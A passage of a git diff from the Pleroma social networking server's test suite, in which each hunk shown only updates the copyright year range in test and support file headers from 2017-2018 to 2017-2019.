index 7ca9a4607..9f395d6b4 100644
--- a/test/captcha_test.exs
+++ b/test/captcha_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.CaptchaTest do
diff --git a/test/config_test.exs b/test/config_test.exs
index 73f3fcb0a..438fe62ee 100644
--- a/test/config_test.exs
+++ b/test/config_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.ConfigTest do
diff --git a/test/daemons/activity_expiration_daemon_test.exs b/test/daemons/activity_expiration_daemon_test.exs
index 31f4a70a6..b51132fb0 100644
--- a/test/daemons/activity_expiration_daemon_test.exs
+++ b/test/daemons/activity_expiration_daemon_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.ActivityExpirationWorkerTest do
diff --git a/test/daemons/scheduled_activity_daemon_test.exs b/test/daemons/scheduled_activity_daemon_test.exs
index 32820b2b7..c8e464491 100644
--- a/test/daemons/scheduled_activity_daemon_test.exs
+++ b/test/daemons/scheduled_activity_daemon_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.ScheduledActivityDaemonTest do
diff --git a/test/emails/admin_email_test.exs b/test/emails/admin_email_test.exs
index 9e83c73c6..31eac5f12 100644
--- a/test/emails/admin_email_test.exs
+++ b/test/emails/admin_email_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Emails.AdminEmailTest do
diff --git a/test/emails/mailer_test.exs b/test/emails/mailer_test.exs
index ae5effb7a..2425c85dd 100644
--- a/test/emails/mailer_test.exs
+++ b/test/emails/mailer_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Emails.MailerTest do
diff --git a/test/emails/user_email_test.exs b/test/emails/user_email_test.exs
index 7d8df6abc..963565f7c 100644
--- a/test/emails/user_email_test.exs
+++ b/test/emails/user_email_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Emails.UserEmailTest do
diff --git a/test/formatter_test.exs b/test/formatter_test.exs
index bfa673049..c443dfe7c 100644
--- a/test/formatter_test.exs
+++ b/test/formatter_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.FormatterTest do
diff --git a/test/html_test.exs b/test/html_test.exs
index b8906c46a..306ad3b3b 100644
--- a/test/html_test.exs
+++ b/test/html_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.HTMLTest do
diff --git a/test/integration/mastodon_websocket_test.exs b/test/integration/mastodon_websocket_test.exs
index d02a3cc4d..ed7ce8fe0 100644
--- a/test/integration/mastodon_websocket_test.exs
+++ b/test/integration/mastodon_websocket_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Integration.MastodonWebsocketTest do
diff --git a/test/list_test.exs b/test/list_test.exs
index 8efba75ea..ba79251da 100644
--- a/test/list_test.exs
+++ b/test/list_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.ListTest do
diff --git a/test/notification_test.exs b/test/notification_test.exs
index 3d2f9a8fc..54c0f9877 100644
--- a/test/notification_test.exs
+++ b/test/notification_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.NotificationTest do
diff --git a/test/object_test.exs b/test/object_test.exs
index ba96aeea4..570213a61 100644
--- a/test/object_test.exs
+++ b/test/object_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.ObjectTest do
diff --git a/test/plugs/authentication_plug_test.exs b/test/plugs/authentication_plug_test.exs
index f7f8fd9f3..9ae4c506f 100644
--- a/test/plugs/authentication_plug_test.exs
+++ b/test/plugs/authentication_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Plugs.AuthenticationPlugTest do
diff --git a/test/plugs/cache_control_test.exs b/test/plugs/cache_control_test.exs
index 45151b289..69ce6cc7d 100644
--- a/test/plugs/cache_control_test.exs
+++ b/test/plugs/cache_control_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.CacheControlTest do
diff --git a/test/plugs/ensure_public_or_authenticated_plug_test.exs b/test/plugs/ensure_public_or_authenticated_plug_test.exs
index d45662a2a..bae95e150 100644
--- a/test/plugs/ensure_public_or_authenticated_plug_test.exs
+++ b/test/plugs/ensure_public_or_authenticated_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Plugs.EnsurePublicOrAuthenticatedPlugTest do
diff --git a/test/plugs/http_security_plug_test.exs b/test/plugs/http_security_plug_test.exs
index 7a2835e3d..9c1c20541 100644
--- a/test/plugs/http_security_plug_test.exs
+++ b/test/plugs/http_security_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Plugs.HTTPSecurityPlugTest do
diff --git a/test/plugs/http_signature_plug_test.exs b/test/plugs/http_signature_plug_test.exs
index d6fd9ea81..d8ace36da 100644
--- a/test/plugs/http_signature_plug_test.exs
+++ b/test/plugs/http_signature_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Plugs.HTTPSignaturePlugTest do
diff --git a/test/plugs/instance_static_test.exs b/test/plugs/instance_static_test.exs
index 6aabc45a4..9b27246fa 100644
--- a/test/plugs/instance_static_test.exs
+++ b/test/plugs/instance_static_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.RuntimeStaticPlugTest do
diff --git a/test/plugs/legacy_authentication_plug_test.exs b/test/plugs/legacy_authentication_plug_test.exs
index 9804e073b..568ef5abd 100644
--- a/test/plugs/legacy_authentication_plug_test.exs
+++ b/test/plugs/legacy_authentication_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Plugs.LegacyAuthenticationPlugTest do
diff --git a/test/plugs/mapped_identity_to_signature_plug_test.exs b/test/plugs/mapped_identity_to_signature_plug_test.exs
index bb45d9edf..6b9d3649d 100644
--- a/test/plugs/mapped_identity_to_signature_plug_test.exs
+++ b/test/plugs/mapped_identity_to_signature_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Plugs.MappedSignatureToIdentityPlugTest do
diff --git a/test/plugs/oauth_plug_test.exs b/test/plugs/oauth_plug_test.exs
index 5a2ed11cc..dea11cdb0 100644
--- a/test/plugs/oauth_plug_test.exs
+++ b/test/plugs/oauth_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Plugs.OAuthPlugTest do
diff --git a/test/plugs/oauth_scopes_plug_test.exs b/test/plugs/oauth_scopes_plug_test.exs
index f328026df..6a13ea811 100644
--- a/test/plugs/oauth_scopes_plug_test.exs
+++ b/test/plugs/oauth_scopes_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Plugs.OAuthScopesPlugTest do
diff --git a/test/plugs/set_format_plug_test.exs b/test/plugs/set_format_plug_test.exs
index bb21956bb..27c026fdd 100644
--- a/test/plugs/set_format_plug_test.exs
+++ b/test/plugs/set_format_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Plugs.SetFormatPlugTest do
diff --git a/test/plugs/set_locale_plug_test.exs b/test/plugs/set_locale_plug_test.exs
index b6c4c1cea..0aaeedc1e 100644
--- a/test/plugs/set_locale_plug_test.exs
+++ b/test/plugs/set_locale_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Plugs.SetLocalePlugTest do
diff --git a/test/plugs/uploaded_media_plug_test.exs b/test/plugs/uploaded_media_plug_test.exs
index 49cf5396a..5ba963139 100644
--- a/test/plugs/uploaded_media_plug_test.exs
+++ b/test/plugs/uploaded_media_plug_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.UploadedMediaPlugTest do
diff --git a/test/scheduled_activity_test.exs b/test/scheduled_activity_test.exs
index edc7cc3f9..dcf12fb49 100644
--- a/test/scheduled_activity_test.exs
+++ b/test/scheduled_activity_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.ScheduledActivityTest do
diff --git a/test/support/captcha_mock.ex b/test/support/captcha_mock.ex
index ef4e68bc5..65ca6b3bd 100644
--- a/test/support/captcha_mock.ex
+++ b/test/support/captcha_mock.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Captcha.Mock do
diff --git a/test/support/conn_case.ex b/test/support/conn_case.ex
index b39c70677..9897f72ce 100644
--- a/test/support/conn_case.ex
+++ b/test/support/conn_case.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.ConnCase do
diff --git a/test/support/data_case.ex b/test/support/data_case.ex
index 17fa15214..4ffcbac9e 100644
--- a/test/support/data_case.ex
+++ b/test/support/data_case.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.DataCase do
diff --git a/test/support/helpers.ex b/test/support/helpers.ex
index a601b3ec8..ce39dd9d8 100644
--- a/test/support/helpers.ex
+++ b/test/support/helpers.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Tests.Helpers do
diff --git a/test/support/http_request_mock.ex b/test/support/http_request_mock.ex
index 231e7c498..6f9886836 100644
--- a/test/support/http_request_mock.ex
+++ b/test/support/http_request_mock.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule HttpRequestMock do
diff --git a/test/support/mrf_module_mock.ex b/test/support/mrf_module_mock.ex
index 12c7e22bc..632c7ff1d 100644
--- a/test/support/mrf_module_mock.ex
+++ b/test/support/mrf_module_mock.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule MRFModuleMock do
diff --git a/test/support/oban_helpers.ex b/test/support/oban_helpers.ex
index 989770926..72792c064 100644
--- a/test/support/oban_helpers.ex
+++ b/test/support/oban_helpers.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Tests.ObanHelpers do
diff --git a/test/support/web_push_http_client_mock.ex b/test/support/web_push_http_client_mock.ex
index d8accd21c..1d6ccff7e 100644
--- a/test/support/web_push_http_client_mock.ex
+++ b/test/support/web_push_http_client_mock.ex
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.WebPushHttpClientMock do
diff --git a/test/tasks/ecto/migrate_test.exs b/test/tasks/ecto/migrate_test.exs
index 0538a7b40..42f6cbf47 100644
--- a/test/tasks/ecto/migrate_test.exs
+++ b/test/tasks/ecto/migrate_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-onl
defmodule Mix.Tasks.Pleroma.Ecto.MigrateTest do
diff --git a/test/tasks/relay_test.exs b/test/tasks/relay_test.exs
index 7bde56606..c866608ab 100644
--- a/test/tasks/relay_test.exs
+++ b/test/tasks/relay_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Mix.Tasks.Pleroma.RelayTest do
diff --git a/test/tasks/user_test.exs b/test/tasks/user_test.exs
index 2b9453042..cf12d9ed6 100644
--- a/test/tasks/user_test.exs
+++ b/test/tasks/user_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Mix.Tasks.Pleroma.UserTest do
diff --git a/test/test_helper.exs b/test/test_helper.exs
index a927b2c3d..fb33e0969 100644
--- a/test/test_helper.exs
+++ b/test/test_helper.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
os_exclude = if :os.type() == {:unix, :darwin}, do: [skip_on_mac: true], else: []
diff --git a/test/upload_test.exs b/test/upload_test.exs
index 6721fe82e..0ca5ebced 100644
--- a/test/upload_test.exs
+++ b/test/upload_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.UploadTest do
diff --git a/test/user_search_test.exs b/test/user_search_test.exs
index 48ce973ad..f7ab31287 100644
--- a/test/user_search_test.exs
+++ b/test/user_search_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.UserSearchTest do
diff --git a/test/user_test.exs b/test/user_test.exs
index b09e9311d..39ba69668 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.UserTest do
diff --git a/test/web/activity_pub/activity_pub_controller_test.exs b/test/web/activity_pub/activity_pub_controller_test.exs
index f83b14452..9e8e420ec 100644
--- a/test/web/activity_pub/activity_pub_controller_test.exs
+++ b/test/web/activity_pub/activity_pub_controller_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do
diff --git a/test/web/activity_pub/relay_test.exs b/test/web/activity_pub/relay_test.exs
index 7315dce26..0f7556538 100644
--- a/test/web/activity_pub/relay_test.exs
+++ b/test/web/activity_pub/relay_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.ActivityPub.RelayTest do
diff --git a/test/web/activity_pub/transmogrifier/follow_handling_test.exs b/test/web/activity_pub/transmogrifier/follow_handling_test.exs
index fe89f7cb0..99ab573c5 100644
--- a/test/web/activity_pub/transmogrifier/follow_handling_test.exs
+++ b/test/web/activity_pub/transmogrifier/follow_handling_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.ActivityPub.Transmogrifier.FollowHandlingTest do
diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs
index 6c296eb0d..ebed65b7c 100644
--- a/test/web/activity_pub/transmogrifier_test.exs
+++ b/test/web/activity_pub/transmogrifier_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do
diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs
index c497ea098..41b4364f2 100644
--- a/test/web/admin_api/admin_api_controller_test.exs
+++ b/test/web/admin_api/admin_api_controller_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.AdminAPI.AdminAPIControllerTest do
diff --git a/test/web/admin_api/search_test.exs b/test/web/admin_api/search_test.exs
index 501a8d007..9df4cd539 100644
--- a/test/web/admin_api/search_test.exs
+++ b/test/web/admin_api/search_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.AdminAPI.SearchTest do
diff --git a/test/web/common_api/common_api_utils_test.exs b/test/web/common_api/common_api_utils_test.exs
index c281dd1f1..230146451 100644
--- a/test/web/common_api/common_api_utils_test.exs
+++ b/test/web/common_api/common_api_utils_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.CommonAPI.UtilsTest do
diff --git a/test/web/federator_test.exs b/test/web/federator_test.exs
index 4096d4690..43a715706 100644
--- a/test/web/federator_test.exs
+++ b/test/web/federator_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.FederatorTest do
diff --git a/test/web/instances/instance_test.exs b/test/web/instances/instance_test.exs
index 0b53bc6cd..e54d708ad 100644
--- a/test/web/instances/instance_test.exs
+++ b/test/web/instances/instance_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Instances.InstanceTest do
diff --git a/test/web/instances/instances_test.exs b/test/web/instances/instances_test.exs
index dea8e2aea..65b03b155 100644
--- a/test/web/instances/instances_test.exs
+++ b/test/web/instances/instances_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.InstancesTest do
diff --git a/test/web/mastodon_api/views/account_view_test.exs b/test/web/mastodon_api/views/account_view_test.exs
index 1d8b28339..2ea87c5f0 100644
--- a/test/web/mastodon_api/views/account_view_test.exs
+++ b/test/web/mastodon_api/views/account_view_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.MastodonAPI.AccountViewTest do
diff --git a/test/web/mastodon_api/views/list_view_test.exs b/test/web/mastodon_api/views/list_view_test.exs
index fb00310b9..59e896a7c 100644
--- a/test/web/mastodon_api/views/list_view_test.exs
+++ b/test/web/mastodon_api/views/list_view_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.MastodonAPI.ListViewTest do
diff --git a/test/web/mastodon_api/views/notification_view_test.exs b/test/web/mastodon_api/views/notification_view_test.exs
index 977ea1e87..9231aaec8 100644
--- a/test/web/mastodon_api/views/notification_view_test.exs
+++ b/test/web/mastodon_api/views/notification_view_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.MastodonAPI.NotificationViewTest do
diff --git a/test/web/mastodon_api/views/push_subscription_view_test.exs b/test/web/mastodon_api/views/push_subscription_view_test.exs
index dc935fc82..4e4f5b7e6 100644
--- a/test/web/mastodon_api/views/push_subscription_view_test.exs
+++ b/test/web/mastodon_api/views/push_subscription_view_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.MastodonAPI.PushSubscriptionViewTest do
diff --git a/test/web/mastodon_api/views/scheduled_activity_view_test.exs b/test/web/mastodon_api/views/scheduled_activity_view_test.exs
index ecbb855d4..6387e4555 100644
--- a/test/web/mastodon_api/views/scheduled_activity_view_test.exs
+++ b/test/web/mastodon_api/views/scheduled_activity_view_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.MastodonAPI.ScheduledActivityViewTest do
diff --git a/test/web/mastodon_api/views/status_view_test.exs b/test/web/mastodon_api/views/status_view_test.exs
index fcdd7fbcb..51f8434fa 100644
--- a/test/web/mastodon_api/views/status_view_test.exs
+++ b/test/web/mastodon_api/views/status_view_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.MastodonAPI.StatusViewTest do
diff --git a/test/web/media_proxy/media_proxy_controller_test.exs b/test/web/media_proxy/media_proxy_controller_test.exs
index 53b8f556b..fdfdb5ec6 100644
--- a/test/web/media_proxy/media_proxy_controller_test.exs
+++ b/test/web/media_proxy/media_proxy_controller_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.MediaProxy.MediaProxyControllerTest do
diff --git a/test/web/media_proxy/media_proxy_test.exs b/test/web/media_proxy/media_proxy_test.exs
index 79699cac5..96bdde219 100644
--- a/test/web/media_proxy/media_proxy_test.exs
+++ b/test/web/media_proxy/media_proxy_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.MediaProxyTest do
diff --git a/test/web/node_info_test.exs b/test/web/node_info_test.exs
index f6147c286..e15a0bfff 100644
--- a/test/web/node_info_test.exs
+++ b/test/web/node_info_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.NodeInfoTest do
diff --git a/test/web/oauth/authorization_test.exs b/test/web/oauth/authorization_test.exs
index d8b008437..2e82a7b79 100644
--- a/test/web/oauth/authorization_test.exs
+++ b/test/web/oauth/authorization_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OAuth.AuthorizationTest do
diff --git a/test/web/oauth/oauth_controller_test.exs b/test/web/oauth/oauth_controller_test.exs
index b492c7794..2780e1746 100644
--- a/test/web/oauth/oauth_controller_test.exs
+++ b/test/web/oauth/oauth_controller_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OAuth.OAuthControllerTest do
diff --git a/test/web/oauth/token/utils_test.exs b/test/web/oauth/token/utils_test.exs
index 20e338cab..dc1f9a986 100644
--- a/test/web/oauth/token/utils_test.exs
+++ b/test/web/oauth/token/utils_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
+# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OAuth.Token.UtilsTest do
diff --git a/test/web/oauth/token_test.exs b/test/web/oauth/token_test.exs
index 3c07309b7..5359940f8 100644
--- a/test/web/oauth/token_test.exs
+++ b/test/web/oauth/token_test.exs
@@ -1,5 +1,5 @@
# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
